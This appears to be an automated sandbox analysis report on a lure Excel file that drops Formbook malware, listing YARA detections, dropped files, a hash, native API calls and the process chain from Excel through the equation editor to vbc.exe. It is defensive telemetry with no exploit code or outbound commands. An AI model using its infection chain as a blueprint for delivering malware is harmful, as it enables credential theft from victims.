Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the 16 ' 000g" " . - yellow bar above 17 ""-t This document is 3. Once you ha
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe Jump to dropped file
Yara signature match
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.665284451.0000000000090000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.498261649.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.506956230.0000000000250000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.491984403.0000000008065000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.665518307.0000000000280000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.665436706.00000000001F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.507006682.0000000000300000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.467257018.00000000034B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_01007C03 4_2_01007C03
Source: C:\Users\Public\vbc.exe Code function: 4_2_0100502D 4_2_0100502D
Source: C:\Users\Public\vbc.exe Code function: 4_2_00420098 4_2_00420098
Source: C:\Users\Public\vbc.exe Code function: 4_2_004201A0 4_2_004201A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425448 4_2_00425448
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425508 4_2_00425508
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042B5A0 4_2_0042B5A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004255B8 4_2_004255B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042AFD0 4_2_0042AFD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00427018 4_2_00427018
Source: C:\Users\Public\vbc.exe Code function: 4_2_004204E1 4_2_004204E1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428799 4_2_00428799
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425891 4_2_00425891
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D9C8 4_2_0042D9C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D9B9 4_2_0042D9B9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00420A19 4_2_00420A19
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042AFC1 4_2_0042AFC1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA0048 4_2_00FA0048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA0047 4_2_00FA0047
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA419A 4_2_00FA419A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00FA56FD 4_2_00FA56FD
Source: C:\Users\Public\vbc.exe Code function: 4_2_01008831 4_2_01008831
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041E993 5_2_0041E993
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D8A 5_2_00402D8A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409E30 5_2_00409E30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041DFD0 5_2_0041DFD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0100502D 5_2_0100502D
Source: C:\Users\Public\vbc.exe Code function: 5_2_01007C03 5_2_01007C03
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A4E0C6 5_2_00A4E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A7D005 5_2_00A7D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A53040 5_2_00A53040
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A6905A 5_2_00A6905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A4E2E9 5_2_00A4E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AF1238 5_2_00AF1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A4F3CF 5_2_00A4F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A763DB 5_2_00A763DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A52305 5_2_00A52305
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A9A37B 5_2_00A9A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A57353 5_2_00A57353
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A85485 5_2_00A85485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A61489 5_2_00A61489
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A6C5F0 5_2_00A6C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A5351F 5_2_00A5351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A54680 5_2_00A54680
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A5E6C1 5_2_00A5E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AF2622 5_2_00AF2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A5C7BC 5_2_00A5C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AD579A 5_2_00AD579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A857C3 5_2_00A857C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AEF8EE 5_2_00AEF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A7286D 5_2_00A7286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A5C85C 5_2_00A5C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A529B2 5_2_00A529B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AF098E 5_2_00AF098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_01008831 5_2_01008831
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027C1238 8_2_027C1238
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271E2E9 8_2_0271E2E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0276A37B 8_2_0276A37B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02727353 8_2_02727353
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02722305 8_2_02722305
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027463DB 8_2_027463DB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271F3CF 8_2_0271F3CF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0273905A 8_2_0273905A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02723040 8_2_02723040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0274D005 8_2_0274D005
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271E0C6 8_2_0271E0C6
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027C2622 8_2_027C2622
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0272E6C1 8_2_0272E6C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02724680 8_2_02724680
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027557C3 8_2_027557C3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0272C7BC 8_2_0272C7BC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027A579A 8_2_027A579A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02755485 8_2_02755485
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02731489 8_2_02731489
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0272351F 8_2_0272351F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0273C5F0 8_2_0273C5F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027D3A83 8_2_027D3A83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02747B00 8_2_02747B00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027ADBDA 8_2_027ADBDA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271FBD7 8_2_0271FBD7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027CCBA4 8_2_027CCBA4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0274286D 8_2_0274286D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0272C85C 8_2_0272C85C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027BF8EE 8_2_027BF8EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027A5955 8_2_027A5955
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027369FE 8_2_027369FE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027229B2 8_2_027229B2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027C098E 8_2_027C098E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0273EE4C 8_2_0273EE4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02752E2F 8_2_02752E2F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0274DF7C 8_2_0274DF7C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02730F3F 8_2_02730F3F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0272CD5B 8_2_0272CD5B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02750D3B 8_2_02750D3B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027BFDDD 8_2_027BFDDD
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 00A4DF5C appears 67 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00A9373B appears 144 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00A93F92 appears 60 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00ABF970 appears 48 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0271E2A8 appears 38 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0276373B appears 238 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 02763F92 appears 108 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0271DF5C appears 106 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0278F970 appears 81 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419D50 NtCreateFile, 5_2_00419D50
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419E00 NtReadFile, 5_2_00419E00
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419E80 NtClose, 5_2_00419E80
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419F30 NtAllocateVirtualMemory, 5_2_00419F30
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419D4A NtCreateFile, 5_2_00419D4A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419E7C NtClose, 5_2_00419E7C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00419F2A NtAllocateVirtualMemory, 5_2_00419F2A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A400C4 NtCreateFile,LdrInitializeThunk, 5_2_00A400C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A40078 NtResumeThread,LdrInitializeThunk, 5_2_00A40078
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00A40048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3F9F0 NtClose,LdrInitializeThunk, 5_2_00A3F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3F900 NtReadFile,LdrInitializeThunk, 5_2_00A3F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00A3FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00A3FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00A3FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00A3FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00A3FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00A3FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FD8C NtDelayExecution,LdrInitializeThunk, 5_2_00A3FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00A3FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00A3FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00A3FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3FFB4 NtCreateSection,LdrInitializeThunk, 5_2_00A3FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A410D0 NtOpenProcessToken, 5_2_00A410D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A40060 NtQuerySection, 5_2_00A40060
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A401D4 NtSetValueKey, 5_2_00A401D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A4010C NtOpenDirectoryObject, 5_2_00A4010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A41148 NtOpenThread, 5_2_00A41148
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A407AC NtCreateMutant, 5_2_00A407AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00A3F8CC NtWaitForSingleObject, 5_2_00A3F8CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027100C4 NtCreateFile,LdrInitializeThunk, 8_2_027100C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027107AC NtCreateMutant,LdrInitializeThunk, 8_2_027107AC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_0270FAE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_0270FB68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FB50 NtCreateKey,LdrInitializeThunk, 8_2_0270FB50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_0270FBB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270F900 NtReadFile,LdrInitializeThunk, 8_2_0270F900
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270F9F0 NtClose,LdrInitializeThunk, 8_2_0270F9F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_0270FED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FFB4 NtCreateSection,LdrInitializeThunk, 8_2_0270FFB4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_0270FC60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_0270FDC0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FD8C NtDelayExecution,LdrInitializeThunk, 8_2_0270FD8C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02710078 NtResumeThread, 8_2_02710078
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02710060 NtQuerySection, 8_2_02710060
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02710048 NtProtectVirtualMemory, 8_2_02710048
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027110D0 NtOpenProcessToken, 8_2_027110D0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02711148 NtOpenThread, 8_2_02711148
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0271010C NtOpenDirectoryObject, 8_2_0271010C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_027101D4 NtSetValueKey, 8_2_027101D4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FA50 NtEnumerateValueKey, 8_2_0270FA50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FA20 NtQueryInformationFile, 8_2_0270FA20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FAD0 NtAllocateVirtualMemory, 8_2_0270FAD0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FAB8 NtQueryValueKey, 8_2_0270FAB8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FBE8 NtQueryVirtualMemory, 8_2_0270FBE8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270F8CC NtWaitForSingleObject, 8_2_0270F8CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02711930 NtSetContextThread, 8_2_02711930
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270F938 NtWriteFile, 8_2_0270F938
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FE24 NtWriteVirtualMemory, 8_2_0270FE24
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FEA0 NtReadVirtualMemory, 8_2_0270FEA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FF34 NtQueueApcThread, 8_2_0270FF34
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FFFC NtCreateProcessEx, 8_2_0270FFFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02710C40 NtGetContextThread, 8_2_02710C40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FC48 NtSetInformationFile, 8_2_0270FC48
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FC30 NtOpenProcess, 8_2_0270FC30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FC90 NtUnmapViewOfSection, 8_2_0270FC90
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0270FD5C NtEnumerateKey, 8_2_0270FD5C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_02711D80 NtSuspendThread, 8_2_02711D80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000A9D50 NtCreateFile, 8_2_000A9D50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000A9E00 NtReadFile, 8_2_000A9E00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_000A9E80 NtClose, 8_2_000A9E80
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: rundll32[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: (QUOTATION)B-RUS-20061REV2.xlsx ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
